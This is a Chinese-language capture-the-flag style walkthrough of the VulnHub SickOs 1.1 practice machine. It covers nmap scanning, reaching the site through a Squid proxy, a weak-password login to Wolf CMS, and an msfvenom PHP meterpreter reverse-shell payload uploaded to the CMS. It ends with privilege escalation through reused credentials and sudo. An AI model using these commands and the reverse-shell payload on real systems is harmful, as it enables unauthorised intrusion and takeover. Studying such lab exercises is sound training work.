网络安全从0到0.5之SickOs1.1靶机实战渗透测试

admin 2022年1月28日02:37:48SecIN安全技术社区网络安全从0到0.5之SickOs1.1靶机实战渗透测试已关闭评论57 views1144字阅读3分48秒阅读模式

download:

https://download.vulnhub.com/sickos/sick0s1.1.7z

环境部署

下载完靶机压缩包后进行解压,将靶机导入vmware中,网络连接方式设为自动桥接

信息收集

主机发现

首先查看靶机的mac地址

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

nmap -sP 172.16.10.0/24

使用上面的命令进行主机发现

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

扫描到ip地址为172.16.10.118

端口扫描

nmap -sV -n -p- 172.16.10.118

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

发现22、3128、8080端口是开放的,但是却没看到熟悉的80端口

先使用nikto进行对3128端口的扫描

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

发现有robots.txt网络爬虫的文件

但是直接进行访问却无法访问,再回到nmap扫描后的结果进行查看。因为3128端口的服务是http-proxy,是一个代理服务,那就进行手动进行代理的配置

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

再次进行访问时,是可以成功访问的

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

访问robots.txt

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

wolfcms

介绍
Wolf CMS是一种内容管理系统,并且免费。其由PHP编码语言写成。
Wolf CMS 0.8.2以及之前版本中存在文件上传漏洞。攻击者可以滥用上传特性来上传恶意的PHP文件到程序中,最终导致任意远程代码执行。

发现有一个cms的网站

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

先使用dirb进行目录的扫描

dirb http://172.16.10.118/wolfcms/ -p 172.16.10.118:3128

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

有这样一些文件,进行访问后都没有什么可用的信息

接着去观察url的规律

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

发现在进行访问的时候都是使用参数传入来进行访问的,然后就想使用?admin会不会就能访问到后台的登录页面

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

果然,在访问后就会自动进行跳转

弱口令

尝试使用弱口令进行登录

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

登录成功

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

这里有一个创建文件的地方,可以直接写入反弹shell,进行远程代码执行

反弹shell

生成木马文件

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o shell.php

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

将生成后文件内容中的注释符进行删除,并且写入网站中的文件中

点击create new file进行创建新文件

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

写入后进行保存

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

访问上面给出的文件路径,在kali中进行监听

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

拿到shell

提权

发现有一个config.php配置文件

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

有root用户和密码

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

发现不是root用户的登录密码

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

又去登录mysql,进行了查看,猜测是mysql的udf提权,但是进行查询后发现相关的参数没有打开

再去查看/home目录中是否有其他的用户

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

查看到有sickos用户,查找了很多,发现[email protected]这个密码是sickos用户的

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

直接使用sudo su进行提权

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

拿到root权限

网络安全从0到0.5之SickOs1.1靶机实战渗透测试

查看flag文件

总结

主要就是有一个需要进行手动配置代理的点是之前没有见过的,但是整体来说难度不大,需要多进行思考。

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月28日02:37:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  网络安全从0到0.5之SickOs1.1靶机实战渗透测试 http://cn-sec.com/archives/757909.html